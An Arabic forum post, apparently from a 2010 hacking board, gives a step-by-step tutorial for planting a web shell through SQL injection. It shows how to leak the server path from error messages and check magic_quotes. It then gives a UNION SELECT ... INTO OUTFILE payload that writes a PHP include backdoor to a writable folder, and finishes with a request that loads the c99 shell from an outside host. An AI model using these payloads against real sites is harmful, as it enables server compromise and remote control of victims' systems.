عرض مشاركة واحدة
قديم 12-26-2010, 12:43 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
جيفارا المنصوري~
 
الصورة الرمزية جيفارا المنصوري~
 

 

 
إحصائية العضو







جيفارا المنصوري~ غير متواجد حالياً

إرسال رسالة عبر MSN إلى جيفارا المنصوري~

 

 

إحصائية الترشيح

عدد النقاط : 10
جيفارا المنصوري~ is on a distinguished road

.... رفع الشل من خلال ثغرة السيكول SQL


السلام عليكم ورحمة الله وبركاته

اليوم بشرح لكم كيف ترفع الشل من خلال ثغره اسمها سيكول او sql


و الطريقة كالتالي :
أولا :
يجب أن نعرف مسارنا على السرفر
و يجب أن يكون magic quotes=OFF الماجيك كويتس أوف
--------------------------------------------------------------------
بعدما استخرجنا عدد الأعمدة و عرفنا المصاب منها
-------------------------------------------------------------------
لنعرف مسارنا عى السرفر ستعمل نفس طريقة معرفة الموقع مصاب بثغرة sql أي نضيف '
و سيضهر لنا مسارنا على السرفر مع جملة الخطأ
-----------------
مثال:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dudi/public_html/katava.php on line 2
هذه جملة خطأ
ومسارنا فيها..
و هو /home/dudi/public_html/ طبعا لا نحتسب الصفحة الأخيرة ي الصابة لأنها ليست ب مجلد
المهم نحفظ المسار و نتابع
---------------
الآن نأتي لكيفية معرفة الmagic quotes on أو off
لهذا الغرض نستبدل أحد الأعمدة المصابة طبعا في أمر معرفة الأعمدة المصابة
ب load_file('/')
أي سيكون الإستغلال هكذا
نفترض أن عدد الأعمدة هو 9 و العمود 4 مصاب
http://www.target.com/file.php?id=-1...39,5,6,7,8,9
و نرى
إذا ضهرت الصفحة نفسها التي تضهر عند طلب الأعمدة المصابة فهذا يعني أن الmagic quotes off
و نستطيع مواصلة عملنا
أما إذا كان ال magic quotes on
فسوف يضهر لنا خطأ سيكول ولا نستطيع رفع الشل في هذه الحالة
------------------------------
طيب ضهر لنا الmagic quotes off ماذا نفعل ؟
-----------------------------
نبحث عن أي شيئ مصرح بتصريح 777
-----------------------------
و ذلك بمحاولة الحصول على مسار أي صورة أو فيديو أو صوت في الصفحة الحالية
مثلا هذا مسار صورة www.target.com/images/image.jpg
أي سيكون مسار الملف المصرح هو /images/
الذي يأتي بعد مسارنا على السرفر طبعا
---------------------------------
نضع هذا الكود في مكان العمود المصاب الذي هو 4 في حالتنا هذه
'<?include("$iraq"); ?>'
و نضيف هذا الأمر في آخر السطر
into+outfile+
ثم نضيف مسارنا على السرفر الذي هو في هذه الحالة
home/dudi/public_html/
ثم نضيف مسار الملف المصرح ب777
/images/
ثم اسم الملف المصاب المراد رفعه بإمتداد php
مثلا example.php
------------------
ليكون الاستغلال كتالي
كود PHP:
www.target.com/file.php?id=-1+union+select+1,2,3,'<?include("$iraq"); ?>',5,6,7,8,9+into+outfile"/home/dudi/public_html/images/example.php"

الآن تم إشائ الملف المقصود و هو هنا

www.target.com/images/example.php
الآن المرحلة الأخيرة هي رفع الشل على صيغة txt

وذلك بالتالي
كود PHP:
http://www.target.com/images/example...xt.tc/c99.txt?


طبعا http://c99.txt.tc/c99.txt
هو مسار الشل بصيغة txt مرفوع جاهز

اتمنى اني كفييت ووفيت <~

هذا الشرح اهداء لـ فولكآنو بعد ماشفت شرحه smilies8




vtu hgag lk oghg eyvm hgsd;,g SQL

التوقيع

إن كنتَ محبوباً لدى ربّك فاعلَم أنّكَ عظيمٌ وإن داستِ الأقدام وجنتيك !

نكته أنت !
تـضحكني كثيييييييراًًً ..
تضحكني عندما تتصنع الـضحكات وخاصةً أمامي ..
ليكن في ذهنك أمر ’’ وهو أن شخصك لايهمني ..
فقط
======================
RooT_vB@Hotmail.com

 

   

رد مع اقتباس